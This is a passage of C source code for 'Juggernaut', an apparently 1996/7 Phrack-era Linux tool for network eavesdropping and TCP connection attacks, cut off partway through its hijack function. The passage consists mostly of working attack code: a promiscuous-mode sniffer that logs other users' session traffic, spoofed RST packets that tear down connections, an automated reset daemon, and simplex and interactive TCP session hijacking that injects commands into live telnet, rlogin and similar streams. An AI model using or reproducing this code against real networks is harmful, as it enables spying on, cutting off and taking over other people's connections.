mwipe(); int prometheus(int); int val,mode; char buf[MINIBUF]; while(1){ mwipe(); mpkta(); fgets(buf,sizeof(buf),stdin); if(!(val=atoi(buf)))continue; switch(val){ case 1: /* TCP */ mode=1; break; case 2: /* UDP */ mode=2; break; case 3: /* ICMP */ mode=3; break; case 4: /* IP */ mode=4; break; case 5: /* Return */ return; default: continue; } if(prometheus(mode))break; } /* NOT REACHED */ } <--> <++> Juggernaut/NumberOneCrush/mem.c /* * * Juggernaut * Version b1 * * 1996/7 Guild productions * daemon9[guild|phrack|r00t] * * comments to route@infonexus.com * * This coding project made possible by a grant from the Guild corporation * * mem.c - contains shared memory and semaphore control logic * * Multi-process: * Initializing and accesing shared memory: * ---------------------------------------- * - Create the shared segment * - Attach each process to the segment (in our case, the hunter child * process will inherit a pointer to the block) * - Grab a semaphore * - Lock the semaphore; Manipulate shared segment; unlock the semaphore * * * Multi-threaded: */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <linux/if_ether.h> #include <linux/ip.h> #include <linux/tcp.h> #include <sys/types.h> #include <sys/ipc.h> #include <sys/sem.h> #include <sys/shm.h> #define SHMKEY 242 /* Shared memory key */ #define SEMKEY 424 /* Semaphore key */ #define PERMS 0666 /* Shared Memory Permissions */ #define MAXNODES 512 /* Maximum number of nodes */ #define ADDMSG "+" #define DELMSG "-" int semid; /* Semaphore ID */ struct sembuf lock[2]={{0,0,0},{0,1,SEM_UNDO}}; /* wait for sem#0 to become 0 then increment sem#0 by 1 */ struct sembuf ulock[1]={{0,-1,(IPC_NOWAIT|SEM_UNDO)}}; /* decrement sem#0 by 1 (sets it to 0) */ struct epack{ /* Generic Ethernet packet w/o data payload */ struct ethhdr eth; /* Ethernet Header */ struct iphdr ip; /* IP header */ struct tcphdr tcp; /* TCP header */ char payload[8192]; /* Data Payload */ }epack; static struct connectionInfo{ /* Simple tuple structure */ unsigned long saddr; /* Source IP */ unsigned long daddr; /* Destination IP */ unsigned short sport; /* Source TCP Port */ unsigned short dport; /* Destination TCP Port */ }*cinfo=0; extern int verbosity; /* * Creates the shared memory segment then attaches it; then creates a binary * semaphore to guarantee exclusive access. Clears the structure array. * Dumps some info. * Much credit to Richard Stevens and Jeff Thompson. */ void powerup(){ void locks(); void ulocks(); void cleardb(); int shmid; /* Shared memory segment id */ int len; len=sizeof(struct connectionInfo)*MAXNODES; /* Request a shared memory segment */ if((shmid=shmget(SHMKEY,len,IPC_CREAT))<0){ if(verbosity)perror("(powerup) shared memory segment allocation error [fatal]"); exit(1); } /* Get one semaphore to perform shared memory locking with */ if((semid=semget(SEMKEY,1,IPC_CREAT|PERMS))<0){ if(verbosity)perror("(powerup) semaphore allocation error [fatal]"); exit(1); } /* Attach to the shared memory segment */ cinfo=(struct connectionInfo *)shmat(shmid,0,0); cleardb(); } /* * Release the shared memory segment. */ void powerdown(){ void locks(); void ulocks(); locks(); shmdt((char *)cinfo); /* Dettach the segment. */ ulocks(); } /* * Locks the semaphore so the caller can access the shared memory segment. * This is an atomic operation. */ void locks(){ if(semop(semid,&lock[0],2)<0){ if(verbosity)perror("(locks) could not lock semaphore [fatal]"); exit(1); } } /* * Unlocks the semaphore so the caller can access the shared memory segment. * This is an atomic operation. */ void ulocks(){ if(semop(semid,&ulock[0],1)<0){ if(verbosity)perror("(ulocks) could not unlock semaphore [fatal]"); exit(1); } } /* * Add a connection to our list. Linear search of the WHOLE list to see if * it's already there (which IT SHOULDN'T BE...), if not, add it in the * first open slot. */ char *addc(iphp,tcphp) struct iphdr *iphp; struct tcphdr *tcphp; { void locks(); void ulocks(); int i=0; /* A wonderfully inefficient linear search for duplicates */ locks(); /* Lock shared memory segment */ for(;i<MAXNODES;i++)if(iphp->saddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){ ulocks(); return(0); /* Opps. Found a duplicate */ } /* Find available slot */ for(i=0;i<MAXNODES;i++){ if(cinfo[i].saddr)continue; else{ cinfo[i].saddr=iphp->saddr; cinfo[i].daddr=iphp->daddr; cinfo[i].sport=tcphp->source; cinfo[i].dport=tcphp->dest; ulocks(); return(ADDMSG); } } /* Control falls here if array is full (which is indicative of a BUSY NETWORK!@*/ ulocks(); return(0); } /* * Remove a connection from our list. Linear search until we find a * correspoding entry, or we hit the end of the list. */ char *delc(iphp,tcphp) struct iphdr *iphp; struct tcphdr *tcphp; { void locks(); void ulocks(); int i=0; locks(); /* Lock shared memory segment */ for(;i<MAXNODES;i++)if(iphp->saddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){ bzero(&cinfo[i],sizeof(cinfo[i])); ulocks(); return(DELMSG); /* Inform caller of success */ } ulocks(); return(0); /* hmm. Wierd. */ } /* * Dump the connection list. */ float dumpc() { void locks(); void ulocks(); char *hostLookup(unsigned long); int i=0; float j=0; locks(); for(;i<MAXNODES;i++)if(cinfo[i].saddr){ fprintf(stderr,"(%d)\t %s [%d]\t-->\t %s [%d]\n",i+1,hostLookup(cinfo[i].saddr),ntohs(cinfo[i].sport),hostLookup(cinfo[i].daddr),ntohs(cinfo[i].dport)); j++; } ulocks(); if(!j)return(0); return(((j/MAXNODES)*100)); /* % utilization */ } /* * Check for a connection by index number. Really only here to make sure the * connection hasn't been deleted since dump() was called.... I think I * will deprecate this function in future versions... */ struct connectionInfo *checkc(target) int target; { void locks(); void ulocks(); static struct connectionInfo tmp; locks(); /* Lock shared memory segment */ if(cinfo[--target].saddr){ memcpy(&tmp,&cinfo[target],sizeof(tmp)); ulocks(); return(&tmp); } ulocks(); /* Nope. Not there */ return((struct connectionInfo *)0); } /* * Clear the connection database */ void cleardb(){ void locks(); void ulocks(); int i=0; locks(); for(;i<MAXNODES;i++)bzero(&cinfo[i],sizeof(cinfo[i])); ulocks(); } <--> <++> Juggernaut/NumberOneCrush/menu.c /* * * Juggernaut * Version b2 * * 1996/7 Guild productions * daemon9[guild|phrack|r00t] * * comments to route@infonexus.com * * This coding project made possible by a grant from the Guild corporation * * menu.c - menu functions. * */ #include <stdio.h> extern char version[]; /* * Initial Screen */ void minit(){ printf("\t\t\t J U G G E R N A U T\n"); printf("\t\t multipurpose network tool for Linux\n"); printf("\t\t\t version: %s\n",version); printf("\n\n\n\n\n\n"); printf("\t (c) 1996/7 daemon9 | A Guild Corporation Production\t\t\t\n"); printf("\n\n\n\n\n\n"); } /* * Main Menu */ void mmain(){ printf("\t\t\t Juggernaut\n"); printf("\t\t\t+------------------------------+\n"); printf("\t\t\t?) Help\n"); printf("\t\t\t0) Program information\n"); printf("\t\t\t1) Connection database\n"); printf("\t\t\t2) Spy on a connection\n"); printf("\t\t\t3) Reset a connection\n"); printf("\t\t\t4) Automated connection reset daemon\n"); printf("\t\t\t5) Simplex connection hijack\n"); printf("\t\t\t6) Interactive connection hijack\n"); printf("\t\t\t7) Packet assembly module\n"); printf("\t\t\t8) Souper sekret option number eight\n"); printf("\t\t\t9) Step Down\n"); printf("\n\n\n\n\n\n\n\n\n"); printf(">"); } /* * Packet Assembly Menu [prometheus module] */ void mpkta(){ printf("\t\t\t Packet Assembly Module (beta)\n"); printf("\t\t\t+------------------------------+\n"); printf("\t\t\t1. TCP Assembler\n"); printf("\t\t\t2. UDP Assembler\n"); printf("\t\t\t3. ICMP Assembler\n"); printf("\t\t\t4. IP Assembler\n"); printf("\t\t\t5. Return to previous menu\n"); printf("\n\n\n\n\n\n\n\n\n\n"); printf(">"); } /* * TCP assembly options menu */ void mpktatcp(packetready,source,destination,seqnum,acknum,control,window,data) int packetready; unsigned short source; unsigned short destination; unsigned long seqnum; unsigned long acknum; char *control; unsigned short window; char data[512]; { printf("\t\t\t TCP Packet Assembly\n"); printf("\t\t\t+------------------------------+\n"); if(!(packetready&0x01))printf("\t\t\t1. Source port\n"); else printf("\t\t\tSource port: %d\n",source); if(!(packetready&0x02))printf("\t\t\t2. Destination port\n"); else printf("\t\t\tDestination port: %d\n",destination); if(!(packetready&0x04))printf("\t\t\t3. Sequence Number\n"); else printf("\t\t\tSequence Number: %ld\n",seqnum); if(!(packetready&0x08))printf("\t\t\t4. Acknowledgement Number\n"); else printf("\t\t\tAcknowledgement Number: %ld\n",acknum); if(!(packetready&0x10))printf("\t\t\t5. Control Bits\n"); else printf("\t\t\tControl Flags: %s\n",control); if(!(packetready&0x20))printf("\t\t\t6. Window Size\n"); else printf("\t\t\tWindow Size: %d\n",window); if(!(packetready&0x40))printf("\t\t\t7. Data Payload\n"); else printf("\t\t\tData payload: %s\n",data); printf("\t\t\t8. Return to previous menu\n"); printf("\t\t\t9. Return to main menu\n"); if(packetready==0x7F)printf("\t\t\t10. Pass packet to RIP assembler\n"); printf("\n\n\n\n\n\n\n\n\n\n"); printf(">"); } /* * UDP assembly options menu */ void mpktaudp(packetready,source,destination,data) int packetready; unsigned short source; unsigned short destination; char data[512]; { printf("\t\t\t UDP Packet Assembly\n"); printf("\t\t\t+------------------------------+\n"); if(!(packetready&0x01))printf("\t\t\t1. Source port\n"); else printf("\t\t\tSource port: %d\n",source); if(!(packetready&0x02))printf("\t\t\t2. Destination port\n"); else printf("\t\t\tDestination port: %d\n",destination); if(!(packetready&0x04))printf("\t\t\t3. Data payload\n"); else printf("\t\t\tData payload: %s\n",data); printf("\t\t\t4. Return to previous menu\n"); printf("\t\t\t5. Return to main menu\n"); if(packetready==0x7)printf("\t\t\t6. Pass packet to RIP assembler\n"); printf("\n\n\n\n\n\n\n\n\n\n"); printf(">"); } /* * ICMP assembly options menu */ void mpktaicmp(packetready,type,code,data) int packetready; unsigned short type; unsigned short code; char data[512]; { printf("\t\t\t ICMP Packet Assembly\n"); printf("\t\t\t+------------------------------+\n"); if(!(packetready&0x01))printf("\t\t\t1. Type\n"); else printf("\t\t\tType: %d\n",type); if(!(packetready&0x02))printf("\t\t\t2. Code\n"); else printf("\t\t\tCode: %d\n",code); if(!(packetready&0x04))printf("\t\t\t3. Data payload\n"); else printf("\t\t\tData payload: %s\n",data); printf("\t\t\t4. Return to previous menu\n"); printf("\t\t\t5. Return to main menu\n"); if(packetready==0x07)printf("\t\t\t6. Pass packet to RIP assembler\n"); printf("\n\n\n\n\n\n\n\n\n\n"); printf(">"); } /* * IP assembly options menu */ void mpktaip(packetready,tos,fflags,fo,ttl,saddr,daddr,number,packettype) int packetready; char *tos; char *fflags; unsigned short fo; unsigned short ttl; char *saddr; char *daddr; int number; char *packettype; { printf("\t\t\t IP Packet Assembly\n"); printf("\t\t\t+------------------------------+\n"); if(!(packetready&0x01))printf("\t\t\t1. TOS\n"); else printf("\t\t\tTOS: %s\n",tos); if(!(packetready&0x02))printf("\t\t\t2. Fragment Flags\n"); else printf("\t\t\tFragment flags: %s\n",fflags); if(!(packetready&0x04))printf("\t\t\t3. Fragment Offset\n"); else printf("\t\t\tFragment offset: %d\n",(fo&0x1fff)); if(!(packetready&0x08))printf("\t\t\t4. TTL\n"); else printf("\t\t\tTTL: %d\n",ttl); if(!(packetready&0x10))printf("\t\t\t5. Source Address\n"); else printf("\t\t\tSource Address: %s\n",saddr); if(!(packetready&0x20))printf("\t\t\t6. Destination Address\n"); else printf("\t\t\tDestination Address: %s\n",daddr); if(!(packetready&0x40))printf("\t\t\t7. Number of packets to send\n"); else printf("\t\t\tSending %d packet(s)\n",number); printf("\t\t\t8. Return to previous menu\n"); printf("\t\t\t9. Return to main menu\n"); if(packetready==0x7f)printf("\t\t\t10. Transmit %s packet(s)\n",packettype); printf("\n\n\n\n\n\n\n\n\n\n"); printf(">"); } /* * Clear the Screen */ void mwipe(){ printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"); } <--> <++> Juggernaut/NumberOneCrush/net.c /* * * Juggernaut * Version b1 * * 1996/7 Guild productions * daemon9[guild|phrack|r00t] * * comments to route@infonexus.com * * This coding project made possible by a grant from the Guild corporation * * net.c - network/socket control code and abstract data types * * In the interest of time overhead vs. code size, I created several functions * that do much the same thing. You will notice the reset and jack code is * quite redundant. Life is rough like that. Deal with it. Also, there are * problems with freeing malloc'd memory. * */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <ctype.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <errno.h> #include <arpa/inet.h> #include <signal.h> #include <string.h> #include <setjmp.h> #include <unistd.h> #include <linux/socket.h> #include <linux/ip.h> #include <linux/tcp.h> #include <linux/if_ether.h> #include <linux/if_arp.h> #include <linux/if.h> #include <linux/sockios.h> #include <sys/time.h> #include <sys/resource.h> #include <sys/ioctl.h> #define DEVICE "eth0" #define ETHHDR 14 #define PHDR 12 #define TCPHDR 20 #define IPHDR 20 #define BUFSIZE 512 #define MINIBUF 10 #define RSTS 10 /* Number of RSTs to send when RSTing a connection */ #define JCKRST 3 /* You may wish to experiment with this value. The smaller it is, your command have less time to complete on the target. However, the ACK storm will also be much shorter... */ #define SNIFLOG "./juggernaut.log.snif" struct iphdr *iphp; /* Pointer into current packets IP header */ struct tcphdr *tcphp; /* Pointer into current packets TCP header */ struct ethhdr *ethhp; /* Pointer into current packets ethernet header */ /* Macro to align the pointers into the ethernet, IP, and TCP headers. */ #define ALIGNNETPOINTERS(){\ ethhp=(struct ethhdr *)(((unsigned long)&epack.eth));\ iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);\ tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);\ } struct epack{ /* Generic Ethernet packet w/o data payload */ struct ethhdr eth; /* Ethernet Header */ struct iphdr ip; /* IP header */ struct tcphdr tcp; /* TCP header */ char payload[8192]; /* Data Payload */ }epack; struct connectionInfo{ unsigned long saddr; /* Source IP */ unsigned long daddr; /* Destination IP */ unsigned short sport; /* Source TCP Port */ unsigned short dport; /* Destination TCP Port */ }; jmp_buf env; /* To preserve our environment */ extern int verbosity; /* Should we dump error messages? */ /* * Creates a low level raw-packet socket and puts the device into promiscuous * mode. */ int tap(device) char *device; { int fd; struct ifreq ifr; /* Link-layer interface request structure */ /* Ethernet code for IP 0x800==ETH_P_IP */ if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){ if(verbosity)perror("(tap) SOCK_PACKET allocation problems [fatal]"); exit(1); } strcpy(ifr.ifr_name,device); if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){ /* Get the device info */ if(verbosity)perror("(tap) Can't get device flags [fatal]"); close(fd); exit(1); } ifr.ifr_flags|=IFF_PROMISC; /* Set promiscuous mode */ if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){ /* Set flags */ if(verbosity)perror("(tap) Can't set promiscuous mode [fatal]"); close(fd); exit(1); } return(fd); } /* * Gimme a raw-IP socket. Use of IP_HDRINCL is automatic with 2.0.x * kernels. Not sure about 1.2.x */ int rawsock(){ int fd,val=1; if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){ if(verbosity)perror("\n(rawsock) Socket problems [fatal]"); exit(1); } #ifdef IP_HDRINCL if(setsockopt(fd,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0){ if(verbosity){ perror("Cannot set IP_HDRINCL socket option"); fprintf(stderr,"\nIf you are relying on this rather then a hacked kernel to spoof packets, your sunk.\n[cr]"); getchar(); } } #endif return(fd); } /* * Hunter. At this point, only cares about connection information (infant * connections and tear-downs). I should have it pass SEQ and ACK related * info to the relevant functions... This function will be forked to the * backround as a seperate process, and in future versions it will be * implemented as a seperate thread of execution. */ void chunt(){ void add(struct iphdr *,struct tcphdr *,struct ethhdr *); void del(struct iphdr *,struct tcphdr *); extern int linksock; /* raw packet socket */ ALIGNNETPOINTERS(); /* No alarm timeout here. We block forever until packets zing by */ while(1)if(recv(linksock,&epack,sizeof(epack),0)){ if(iphp->protocol==IPPROTO_TCP&&(tcphp->syn&&!tcphp->ack))add(iphp,tcphp,ethhp); if(iphp->protocol==IPPROTO_TCP&&(tcphp->rst||tcphp->fin))del(iphp,tcphp); } } /* * addc() wrapper. Checks to make sure we want to add this connection to * our list.... At this point, we'll take ftp control, ssh (well, we can * RST them) telnet, smtp, http, rlogin, and irc. */ void add(iphp,tcphp,ethhp) struct iphdr *iphp; struct tcphdr *tcphp; struct ethhdr *ethhp; /* Future Use */ { char *addc(struct iphdr *, struct tcphdr *); char *msg; #ifdef GREED if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg); #ifdef NOHUSH fprintf(stderr,"%c",7); #endif return; #else switch(ntohs(tcphp->dest)){ case 21: case 22: case 23: case 25: case 80: case 513: case 6667: if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg); #ifdef NOHUSH fprintf(stderr,"%c",7); #endif return; default: return; } #endif } /* * delc() wrapper. Checks connection port number to see if we should even * bother passing to the delete function which will do a potentially expensive * linear search... */ void del(iphp,tcphp) struct iphdr *iphp; struct tcphdr *tcphp; { char *delc(struct iphdr *, struct tcphdr *); char *msg; #ifdef GREED if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg); return; #else switch(ntohs(tcphp->dest)){ case 21: case 22: case 23: case 25: case 80: case 513: case 6667: if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg); return; default: return; } #endif } /* * Spy on a connection. If the packet captured is from the target connection, * call dumpp(). If fp is valid, prepend header/append footer. */ void cspy(target,fp) struct connectionInfo *target; FILE *fp; { char *hostLookup(unsigned long); void dumpp(char *,int,FILE *); extern int sigsentry; int tlinksock=tap(DEVICE); /* Spying tap. XXX- Really dumb way to do this... */ time_t tp; ALIGNNETPOINTERS(); fprintf(stderr,"Spying on connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport)); if(fp){ fprintf(fp,"---------------------------------------------------------------------\n: Juggernaut connection spy log header\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport)); time(&tp); fprintf(fp,": Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp)); } /* NO alaram timeout here. SIGINT kills our spy session */ while(sigsentry)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP)if(iphp->saddr==target->daddr&&tcphp->source==target->dport)dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),fp); if(fp){ fprintf(fp,"\n---------------------------------------------------------------------\n: Juggernaut connection spy log trailer\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport) ); time(&tp); fprintf(fp,": Log ended:\t\t%s---------------------------------------------------------------------\n",ctime(&tp)); } close(tlinksock); } /* * Dumps the payload. Dump to file if we have a valid FP. */ void dumpp(payload,length,fp) char *payload; int length; FILE *fp; { register int tickytacky=0; for(;tickytacky<length;tickytacky++){ fprintf(stderr,"%c",payload[tickytacky]); if(fp)fprintf(fp,"%c",payload[tickytacky]); } } /* * RST both ends of a connection. Listen for the client to send a packet so * we know where the seq/ack #s are and then spoof 10 RSTs to the client which * will then send a RST to the other end when it recieves the legitimate * response packet. */ void crst(target) struct connectionInfo *target; { void nettimeout(); char *hostLookup(unsigned long); unsigned short in_cksum(unsigned short *,int); char *tempBuf=0; extern int ripsock; extern int netreadtimeout; struct sockaddr_in sin; struct tpack{ /* Generic TCP packet w/o payload */ struct iphdr ip; struct tcphdr tcp; }tpack; struct psuedoHeader{ unsigned long saddr; unsigned long daddr; unsigned char null; unsigned char prot; unsigned short tlen; }*ppheader; static int moot=0; int tlinksock=tap(DEVICE); ALIGNNETPOINTERS(); sin.sin_family=AF_INET; /* Preload these values. All we are really waiting for are the seq/ack #s */ sin.sin_port=target->dport; sin.sin_addr.s_addr=target->saddr; bzero(&tpack,sizeof(tpack)); /* Zero out these structures so I dunot have to assign 0's to the unused areas... */ bzero(&ppheader,sizeof(ppheader)); tpack.tcp.source=target->dport; /* 16-bit Source port number */ tpack.tcp.dest=target->sport; /* 16-bit Destination port */ tpack.tcp.doff=5; /* Data offset */ tpack.tcp.ack=1; /* Acknowledgement field valid flag */ tpack.tcp.rst=1; /* Reset flag */ tpack.tcp.window=htons(242); /* 16-bit Window size */ tpack.ip.version=4; /* 4-bit Version */ tpack.ip.ihl=5; /* 4-bit Header Length */ tpack.ip.tot_len=htons(IPHDR+TCPHDR); /* 16-bit Total length */ tpack.ip.ttl=64; /* 8-bit Time To Live */ tpack.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */ tpack.ip.saddr=target->daddr; /* 32-bit Source Address */ tpack.ip.daddr=target->saddr; /* 32-bit Destination Address */ tempBuf=(char *)malloc(PHDR+TCPHDR); /* Checksum stuff */ ppheader=(struct psuedoHeader *)tempBuf; ppheader->saddr=tpack.ip.saddr; ppheader->daddr=tpack.ip.daddr; ppheader->prot=IPPROTO_TCP; ppheader->null=0; ppheader->tlen=htons(TCPHDR); fprintf(stderr,"Reseting connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport)); if(setjmp(env)){ /* Timeout */ if(verbosity)fprintf(stderr,"Quiet connection, not reset. [soft error, returning]\n"); return; } signal(SIGALRM,nettimeout); alarm(netreadtimeout); /* Wait 10 seconds for reply */ while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->saddr&&tcphp->source==target->sport){ for(;moot<RSTS;moot++){ /* Send RSTs, incrementing seqs and acks as we go */ tpack.tcp.seq=tcphp->ack_seq+(htonl(moot)); tpack.tcp.ack_seq=tcphp->seq+(htonl(moot)); bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR); tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR); sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin)); } alarm(0); /*free(tempBuf); XXX */ fprintf(stderr,"Connection torn down.\n"); close(tlinksock); break; } } /* * Sets up automated connection reseting. A source and possibly a * destination host are targeted for reseting. This function will kill any * connection attempts from the source (and possibly to a destination). */ void acrst(source,target) unsigned long source, target; { char *hostLookup(unsigned long); unsigned short in_cksum(unsigned short *,int); void spasm(); /* Handles the user defined signal */ struct tpack{ struct iphdr ip; struct tcphdr tcp; }tpack; struct psuedoHeader{ unsigned long saddr; unsigned long daddr; unsigned char null; unsigned char prot; unsigned short tlen; }*ppheader; struct sockaddr_in sin; int moot=0; extern int ripsock; extern int acrstpid; char *tempBuf=0; int tlinksock=tap(DEVICE); switch((acrstpid=fork())){ /* Drop a child to backround, return the parent to continue */ case 0: /* Set the priority up a few notchs.. I get better results */ if(setpriority(PRIO_PROCESS,0,-20)){ if(verbosity)perror("acrst module (setpriority)"); fprintf(stderr,"[cr]"); getchar(); } signal(SIGUSR1,spasm); /* Keep track of the child and register it with the cleanup signal handler */ signal(SIGINT,SIG_IGN); signal(SIGQUIT,SIG_IGN); break; default: return; case -1: if(verbosity)perror("acrst module Internal forking error [fatal]"); exit(1); } ALIGNNETPOINTERS(); /* Preload these values. */ sin.sin_family=AF_INET; bzero(&tpack,sizeof(tpack)); bzero(&ppheader,sizeof(ppheader)); tpack.tcp.doff=5; tpack.tcp.ack=1; tpack.tcp.rst=1; tpack.tcp.window=htons(242); tpack.ip.version=4; tpack.ip.ihl=5; tpack.ip.tot_len=htons(IPHDR+TCPHDR); tpack.ip.ttl=64; tpack.ip.protocol=IPPROTO_TCP; tempBuf=(char *)malloc(PHDR+TCPHDR); ppheader=(struct psuedoHeader *)tempBuf; ppheader->null=0; ppheader->prot=IPPROTO_TCP; ppheader->tlen=htons(TCPHDR); while(1){ if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn&&iphp->saddr==source){ if(target)if(iphp->daddr!=target)continue; sin.sin_port=tcphp->dest; sin.sin_addr.s_addr=iphp->saddr; tpack.tcp.source=tcphp->dest; tpack.tcp.dest=tcphp->source; for(moot=1;moot<RSTS+1;moot++){ /* Send RSTs, incrementing acks as we go */ tpack.tcp.ack_seq=tcphp->seq+(htonl(moot)); tpack.tcp.check=0; tpack.ip.saddr=iphp->daddr; tpack.ip.daddr=iphp->saddr; tpack.ip.check=0; ppheader->saddr=tpack.ip.saddr; ppheader->daddr=tpack.ip.daddr; bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR); tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR); sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin)); fprintf(stderr,"%c-%c*",0x08,0x08); } } } } /* * Simplex-hijack. Really just inserts a command into the TCP stream. This * will totally desynch the connection however and cause two things to happen: * 1) an ACK storm of epic proportions (maybe not, see accompanying paper) and * 2) the target user will have her connection destroyed. To alleviate the * first problem, we simply reset the connection shortly after we hijack it. * The second problem is a burden with this kind of hijacking. */ void csimplexhijack(target,commandbuf) struct connectionInfo *target; char *commandbuf; { void nettimeout(); char *hostLookup(unsigned long); unsigned short in_cksum(unsigned short *,int); struct tpack{ /* Generic TCP packet */ struct iphdr ip; struct tcphdr tcp; char payload[BUFSIZE]; }tpack; struct psuedoHeader{ unsigned long saddr; unsigned long daddr; unsigned char null; unsigned char prot; unsigned short tlen; }*ppheader; struct sockaddr_in sin; extern int ripsock; extern int netreadtimeout; static int len; char *tempBuf; int tlinksock=tap(DEVICE); ALIGNNETPOINTERS(); bzero(&tpack,sizeof(tpack)); len=strlen(commandbuf)+1; bcopy(commandbuf,tpack.payload,len--); sin.sin_family=AF_INET; sin.sin_port=target->sport; sin.sin_addr.s_addr=target->daddr; tpack.tcp.source=target->sport; tpack.tcp.dest=target->dport; tpack.tcp.doff=5; tpack.tcp.ack=1; tpack.tcp.psh=1; tpack.tcp.window=htons(242); tpack.ip.version=4; tpack.ip.ihl=5; tpack.ip.tot_len=htons(IPHDR+TCPHDR+len); tpack.ip.ttl=64; tpack.ip.protocol=IPPROTO_TCP; tpack.ip.saddr=target->saddr; tpack.ip.daddr=target->daddr; tempBuf=(char *)malloc(PHDR+TCPHDR+len); /* Check me out y0 */ ppheader=(struct psuedoHeader *)tempBuf; ppheader->saddr=tpack.ip.saddr; ppheader->daddr=tpack.ip.daddr; ppheader->null=0; ppheader->prot=IPPROTO_TCP; ppheader->tlen=htons(TCPHDR+len); fprintf(stderr,"(simplex) Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport)); if(setjmp(env)){ /* Timeout */ if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n"); return; } signal(SIGALRM,nettimeout); alarm(0); alarm(netreadtimeout); /* Wait 10 seconds for reply */ while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){ tpack.tcp.seq=tcphp->ack_seq; tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1); bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len); tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len); sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin)); fprintf(stderr,"Command inserted, connection desynched.\n"); sleep(JCKRST); /* Don't reset the connection too quickly, or our command may not complete */ crst(target); close(tlinksock); /* free(tempBuf); XXX */ break; } } /* * Hijack. Desynchs the server from the client. The resulting ACK storm * makes things very difficult. */ void chijack(target) struct connectionInfo *target; { void nettimeout(); void seizure(); char *hostLookup(unsigned long); unsigned short in_cksum(unsigned short *,int); struct tpack{ struct iphdr ip; struct tcphdr tcp; char payload[2*BUFSIZE]; }tpack; struct psuedoHeader{ unsigned long saddr; unsigned long daddr; unsigned char null; unsigned char prot; unsigned short tlen; }*ppheader; struct sockaddr_in sin; char buf[10*MINIBUF]; char *tempBuf=0; extern int ripsock; extern int netreadtimeout; extern int sigsentry; static int len; int tlinksock=tap(DEVICE); ALIGNNETPOINTERS(); bzero(&tpack,sizeof(tpack)); sin.sin_family=AF_INET; sin.sin_port=target->sport; sin.sin_addr.s_addr=target->daddr; tpack.tcp.source=target->sport; tpack.tcp.dest=target->dport; tpack.tcp.doff=5; tpack.tcp.ack=1; tpack.tcp.psh=1; tpack.tcp.window=htons(1024); tpack.ip.version=4; tpack.ip.ihl=5; tpack.ip.ttl=64; tpack.ip.protocol=IPPROTO_TCP; tpack.ip.saddr=target->saddr; tpack.ip.daddr=target->daddr; tempBuf=(char *)malloc(PHDR+TCPHDR+len); ppheader=(struct psuedoHeader *)tempBuf; ppheader->saddr=tpack.ip.saddr; ppheader->daddr=tpack.ip.daddr; ppheader->null=0; ppheader->prot=IPPROTO_TCP; signal(SIGINT,seizure); fprintf(stderr,"Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport)); fprintf(stderr,"'ctrl-c' when you are finished (this will RST the connection).\n"); fprintf(stderr,"juggernaut>"); fgets(buf,sizeof(buf),stdin); len=strlen(buf)+1; bcopy(buf,tpack.payload,len--); tpack.ip.tot_len=htons(IPHDR+TCPHDR+len); ppheader->tlen=htons(TCPHDR+len); if(setjmp(env)){ if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n"); 